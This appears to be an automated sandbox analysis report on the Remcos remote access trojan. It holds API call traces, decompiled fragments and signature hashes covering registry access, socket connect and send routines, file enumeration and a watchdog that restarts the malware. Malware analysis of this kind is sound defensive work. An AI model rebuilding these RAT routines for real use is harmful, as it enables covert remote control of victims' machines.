                                    • Part of subcall function 00409D02: SizeofResource.KERNEL32(00000000,00000000,?,?,?,0040983C,00000000,?,?,00000000), ref: 00409D2D
                                  • malloc.MSVCRT ref: 00409846
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(00000000,00000000,?,00000000), ref: 00409872
                                  • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 0040987E
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00409887
                                  • malloc.MSVCRT ref: 00409898
                                    • Part of subcall function 0040309E: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(?,?,?,00000001,?,?,00000000,00408CAD,00000000), ref: 004030B4
                                    • Part of subcall function 0040309E: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?), ref: 004030C0
                                    • Part of subcall function 0040309E: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,00000000), ref: 004030D5
                                    • Part of subcall function 0040309E: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004030DE
                                  • free.MSVCRT(?,?,?,00000000,00408CAD,00000000), ref: 004098E3
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 004098F1
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004098FA
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.676673165.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$D@2@@std@@D@std@@U?$char_traits@$??0?$basic_string@Resource$??1?$basic_string@V01@@$D@1@@malloc$??4?$basic_string@?c_str@?$basic_string@FindLoadLockSizeofV01@free
                                  • String ID:
                                  • API String ID: 531887698-0
                                  • Opcode ID: c242165edecd777d466082f244190311df4795ce01b8674b0afa1ef32b865684
                                  • Instruction ID: 644eff2a9cee41870484989b0ac8d3f9873871745537e3c52d27647a0f1bd5cd
                                  • Opcode Fuzzy Hash: c242165edecd777d466082f244190311df4795ce01b8674b0afa1ef32b865684
                                  • Instruction Fuzzy Hash: 5B314971A0010DEFCF04DFA4E9999EEBBB9FF88315B10416AE916A3290DB746F04CB54
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E0040B4C8(void* __ecx, void* _a4, void* _a8, char* _a12, char* _a16) {
                                  				int _v8;
                                  				int _v12;
                                  				int _t14;
                                  				long _t16;
                                  				long _t20;
                                  				signed int _t21;
                                  
                                  				_t14 = 4;
                                  				_v8 = _t14;
                                  				_v12 = _t14;
                                  				_t16 = RegOpenKeyExA(_a4, _a8, 0, 0x20019,  &_a8); // executed
                                  				if(_t16 != 0) {
                                  					return 0;
                                  				} else {
                                  					_t20 = RegQueryValueExA(_a8, _a12, 0,  &_v12, _a16,  &_v8); // executed
                                  					_t21 = RegCloseKey(_a8); // executed
                                  					return _t21 & 0xffffff00 | _t20 == 0x00000000;
                                  				}
                                  			}

                                  APIs
                                  • RegOpenKeyExA.KERNELBASE(80000001,00408EBE,00000000,00020019,00408EBE,?,?,?,00408EBE,80000001,00000000,?,?,?,?,0000000E), ref: 0040B4E7
                                  • RegQueryValueExA.KERNELBASE(00408EBE,?,00000000,80000001,?,00000000,0041BCB0,?,?,?,00408EBE,80000001,00000000), ref: 0040B505
                                  • RegCloseKey.KERNELBASE(00408EBE,?,?,?,00408EBE,80000001,00000000,?,?,?,?,0000000E,00415774), ref: 0040B510
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.676673165.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: CloseOpenQueryValue
                                  • String ID:
                                  • API String ID: 3677997916-0
                                  • Opcode ID: 55f81898a082b856529423ab666f51d9d292b3708a6e04e50ac108d0079eece6
                                  • Instruction ID: e9b8f34285146556d923ff1311e539e3090c3a2a7499f994c32c4d3a3a900868
                                  • Opcode Fuzzy Hash: 55f81898a082b856529423ab666f51d9d292b3708a6e04e50ac108d0079eece6
                                  • Instruction Fuzzy Hash: A8F0F976900218FFDF118FA0EC06FDA7FA8EB48764F148165FA05EA150E7719A10AB94
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.676673165.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: __dllonexit_onexit
                                  • String ID:
                                  • API String ID: 2384194067-0
                                  • Opcode ID: a0f76b705919cd2b1b3505feded0ad4b759bc61fe2e2080deee93d3e34803ae7
                                  • Instruction ID: 4ade6cbf426c929272142e716342c2a11d1dea90e179e11a85702f2ae3751f82
                                  • Opcode Fuzzy Hash: a0f76b705919cd2b1b3505feded0ad4b759bc61fe2e2080deee93d3e34803ae7
                                  • Instruction Fuzzy Hash: 55C01274CC4301FBCF102B60BC866C67711B7A1B32BA087AAF565110F0C77D49A4AA0D
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Non-executed Functions

                                  APIs
                                  • _EH_prolog.MSVCRT ref: 00404783
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,00000004,0041B310), ref: 004047A0
                                  • socket.WS2_32(00000000,00000001,00000006), ref: 004047B3
                                  • connect.WS2_32(00000000,0041B320,00000010), ref: 004047C2
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,?,0041B310,?,00000000,00000001,00000006), ref: 004047EB
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,00000000,00000001,00000006), ref: 004047F5
                                    • Part of subcall function 00402440: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(0041BE70,?,?,?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 0040244A
                                    • Part of subcall function 00402440: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60([DataStart],00000013,?,?,?,?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 00402463
                                    • Part of subcall function 00402440: ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP60(0000000B,?,?,?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 0040246E
                                    • Part of subcall function 00402440: ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP60(0000000F,?,?,?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 0040247B
                                    • Part of subcall function 00402440: ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 0040248D
                                    • Part of subcall function 00402440: ?empty@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE_NXZ.MSVCP60(?,?,?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 00402498
                                    • Part of subcall function 00402440: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00000000,?,?,?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 004024A7
                                    • Part of subcall function 00402440: ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,?,?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 004024B1
                                    • Part of subcall function 00402440: send.WS2_32(?,00000000), ref: 004024BB
                                    • Part of subcall function 00402440: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 00402512
                                    • Part of subcall function 00402440: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 0040251B
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000001,00000006), ref: 0040481B
                                  • _CxxThrowException.MSVCRT(00000001,00416FB8), ref: 0040483B
                                  • ?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000001,00000006), ref: 00404849
                                  • ?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000001,00000006), ref: 00404853
                                  • ?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000001,00000006), ref: 0040485D
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,?,0041594C,?), ref: 00404883
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?,?,?), ref: 0040488D
                                  • FindFirstFileW.KERNEL32(00000000,?,?,?), ref: 00404894
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?), ref: 004048A3
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00415664,?), ref: 004048C2
                                  • _CxxThrowException.MSVCRT(00000002,00416FB8), ref: 004048E8
                                  • FindNextFileW.KERNEL32(000000FF,?,?,?,?), ref: 004048F7
                                  • wcscmp.MSVCRT ref: 00404924
                                  • wcscmp.MSVCRT ref: 0040493C
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(?,?,00415A24), ref: 00404961
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z.MSVCP60(?,?,00000000), ref: 00404973
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000), ref: 00404983
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00404991
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040499D
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 004049AC
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 004049BE
                                    • Part of subcall function 00404C0A: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,0041B310,?,76959F40), ref: 00404C1F
                                    • Part of subcall function 00404C0A: ?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ.MSVCP60(76902590,?,76959F40), ref: 00404C2F
                                    • Part of subcall function 00404C0A: ?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ.MSVCP60(00000000,?,76959F40), ref: 00404C39
                                    • Part of subcall function 00404C0A: ?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ.MSVCP60(00000000,?,76959F40), ref: 00404C43
                                    • Part of subcall function 00404C0A: ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,?,0041594C,?), ref: 00404C66
                                    • Part of subcall function 00404C0A: ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?,?,?), ref: 00404C70
                                    • Part of subcall function 00404C0A: FindFirstFileW.KERNEL32(00000000,?,?,?), ref: 00404C77
                                    • Part of subcall function 00404C0A: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?), ref: 00404C83
                                    • Part of subcall function 00404C0A: FindNextFileW.KERNEL32(000000FF,?,?,?,?), ref: 00404C9D
                                    • Part of subcall function 00404C0A: wcscmp.MSVCRT ref: 00404CCA
                                    • Part of subcall function 00404C0A: wcscmp.MSVCRT ref: 00404CE2
                                    • Part of subcall function 00404C0A: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(?,?,0000005C), ref: 00404CFA
                                    • Part of subcall function 00404C0A: ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z.MSVCP60(?,000000FF,00000000), ref: 00404D0C
                                    • Part of subcall function 00404C0A: ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@G@Z.MSVCP60(?,00000000), ref: 00404D19
                                    • Part of subcall function 00404C0A: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00404D27
                                    • Part of subcall function 00404C0A: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00404D30
                                    • Part of subcall function 00404C0A: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 00404D3F
                                    • Part of subcall function 00404C0A: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 00404D4E
                                  • _CxxThrowException.MSVCRT(00000003,00416FB8), ref: 004049E5
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(00000003,00416FB8), ref: 004049F0
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(?,?,?,?,?), ref: 00404A0A
                                  • ?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ.MSVCP60(?,?,?), ref: 00404A1C
                                  • ?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ.MSVCP60(00000000,?,?,?), ref: 00404A29
                                  • ?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ.MSVCP60(00000000,?,?,?), ref: 00404A36
                                  • ?find@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIABV12@I@Z.MSVCP60(?,00000000), ref: 00404A51
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(00000010,00000250,?), ref: 00404A7E
                                  • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 00404A88
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00404A94
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,0041B310,?), ref: 00404AC0
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?), ref: 00404ACA
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00404AF0
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00404AFC
                                  • _CxxThrowException.MSVCRT(00000004,00416FB8), ref: 00404B1C
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(00000004,00416FB8,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00404B27
                                  • FindClose.KERNEL32(000000FF,?,?,?), ref: 00404B39
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,?,0041B310,?), ref: 00404B56
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?), ref: 00404B60
                                    • Part of subcall function 00402440: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 004024C7
                                    • Part of subcall function 00402440: ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,?,?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 004024D1
                                    • Part of subcall function 00402440: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00000000,?,00000000,?,?,?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 004024EB
                                    • Part of subcall function 00402440: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,?,?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 004024F5
                                    • Part of subcall function 00402440: send.WS2_32(?,00000000), ref: 004024FF
                                    • Part of subcall function 00402440: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 00402509
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00404B78
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00404B81
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?), ref: 00404B99
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?), ref: 00404BA2
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?), ref: 00404BAB
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?), ref: 00404BB4
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?), ref: 00404BBD
                                  • atoi.MSVCRT ref: 00404B88
                                    • Part of subcall function 00404EA7: _EH_prolog.MSVCRT ref: 00404EAC
                                    • Part of subcall function 00404EA7: closesocket.WS2_32(?), ref: 00404EEE
                                    • Part of subcall function 00404EA7: TerminateThread.KERNEL32(?,00000001,00000000,?,00000001,00000001,00000000,00000004,0041B310,?,?,?,0040E3FF,00000000), ref: 00404F00
                                  • _CxxThrowException.MSVCRT(00000000,00000000), ref: 00404BD6
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,00000000,00000000,0041B320,00000010,00000000,00000001,00000006), ref: 00404BDE
                                  • atoi.MSVCRT ref: 00404BE5
                                  • FindClose.KERNEL32(?), ref: 00404BF6
                                  • ExitThread.KERNEL32 ref: 00404BFE
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.676673165.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$U?$char_traits@$D@std@@$G@std@@$D@2@@std@@$G@2@@std@@$??1?$basic_string@$??0?$basic_string@Hstd@@V?$basic_string@$V10@0@$?begin@?$basic_string@D@2@@0@FindG@2@@0@V01@@$?c_str@?$basic_string@D@1@@ExceptionThrow$?length@?$basic_string@FileV10@wcscmp$?end@?$basic_string@G@1@@$?data@?$basic_string@A?$basic_string@CloseFirstH_prologNextThreadV01@atoisend$??4?$basic_string@?empty@?$basic_string@?find@?$basic_string@ExitTerminateV12@Y?$basic_string@closesocketconnectsocket
                                  • String ID:
                                  • API String ID: 338953085-0
                                  • Opcode ID: 64b6d24a099f49f87b4da525077f38fde3800b06bfc63a19b21d2caf8c47ce30
                                  • Instruction ID: 4b461097a1424462df126d137943af890334f3d1b741e30b480b936ae2585c0a
                                  • Opcode Fuzzy Hash: 64b6d24a099f49f87b4da525077f38fde3800b06bfc63a19b21d2caf8c47ce30
                                  • Instruction Fuzzy Hash: B4C14072800609EBCB11FFA0DC49ADE777CEB54345F0041AAF506A71A1EB745B85CF58
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • GetCurrentProcessId.KERNEL32 ref: 0040A5FE
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00416524,00000000), ref: 0040A611
                                    • Part of subcall function 0040B829: RegCreateKeyA.ADVAPI32(?,?,?), ref: 0040B836
                                    • Part of subcall function 0040B829: RegSetValueExA.ADVAPI32(?,00000004,00000000,00000004,?,00000004,00000000,?,00409CDD,80000001,00000000), ref: 0040B851
                                    • Part of subcall function 0040B829: RegCloseKey.ADVAPI32(?,?,00409CDD,80000001,00000000), ref: 0040B85C
                                  • OpenMutexA.KERNEL32 ref: 0040A63B
                                  • CloseHandle.KERNEL32(00000000), ref: 0040A64A
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(Remcos restarted by watchdog!,?), ref: 0040A65E
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(Watchdog module activated,?), ref: 0040A68C
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([INFO],?), ref: 0040A69C
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(WDH,?), ref: 0040A6B6
                                    • Part of subcall function 0040B4C8: RegOpenKeyExA.KERNELBASE(80000001,00408EBE,00000000,00020019,00408EBE,?,?,?,00408EBE,80000001,00000000,?,?,?,?,0000000E), ref: 0040B4E7
                                    • Part of subcall function 0040B4C8: RegQueryValueExA.KERNELBASE(00408EBE,?,00000000,80000001,?,00000000,0041BCB0,?,?,?,00408EBE,80000001,00000000), ref: 0040B505
                                    • Part of subcall function 0040B4C8: RegCloseKey.KERNELBASE(00408EBE,?,?,?,00408EBE,80000001,00000000,?,?,?,?,0000000E,00415774), ref: 0040B510
                                  • OpenProcess.KERNEL32(001F0FFF,00000000,?), ref: 0040A6D4
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(WDH), ref: 0040A6E2
                                    • Part of subcall function 0040B95B: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(?,?,origmsc), ref: 0040B96C
                                    • Part of subcall function 0040B95B: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(004032A4,?), ref: 0040B97C
                                    • Part of subcall function 0040B95B: ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,004032A4,80000001), ref: 0040B993
                                    • Part of subcall function 0040B95B: ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,004032A4), ref: 0040B9AB
                                    • Part of subcall function 0040B95B: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040B9C2
                                    • Part of subcall function 0040B95B: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040B9CB
                                    • Part of subcall function 0040B95B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040B9D4
                                    • Part of subcall function 0040B95B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040B9DD
                                    • Part of subcall function 0040A8CE: OpenProcess.KERNEL32(00100000,00000000,?,80000001,?,0040A86F), ref: 0040A8DC
                                    • Part of subcall function 0040A8CE: WaitForSingleObject.KERNEL32(00000000,000000FF,?,0040A86F), ref: 0040A8E7
                                    • Part of subcall function 0040A8CE: CloseHandle.KERNEL32(00000000,?,0040A86F), ref: 0040A8EE
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(\SysWOW64,?), ref: 0040A7A3
                                  • _wgetenv.MSVCRT ref: 0040A7B3
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(00000000), ref: 0040A7BE
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040A7C9
                                  • ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 0040A7D5
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040A7DE
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040A7E7
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(Watchdog launch failed!,?), ref: 0040A882
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([ERROR],?), ref: 0040A896
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([INFO],?), ref: 0040A673
                                    • Part of subcall function 0041203B: GetLocalTime.KERNEL32(?), ref: 00412052
                                    • Part of subcall function 0041203B: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,%02i:%02i:%02i:%03i ,?,00416BFC,?,00415770,?,?,Q@,?), ref: 00412087
                                    • Part of subcall function 0041203B: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,Q@,?), ref: 00412094
                                    • Part of subcall function 0041203B: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,Q@,?), ref: 004120A1
                                    • Part of subcall function 0041203B: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,Q@,?), ref: 004120AE
                                    • Part of subcall function 0041203B: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,Q@,?), ref: 004120B8
                                    • Part of subcall function 0041203B: printf.MSVCRT ref: 004120BF
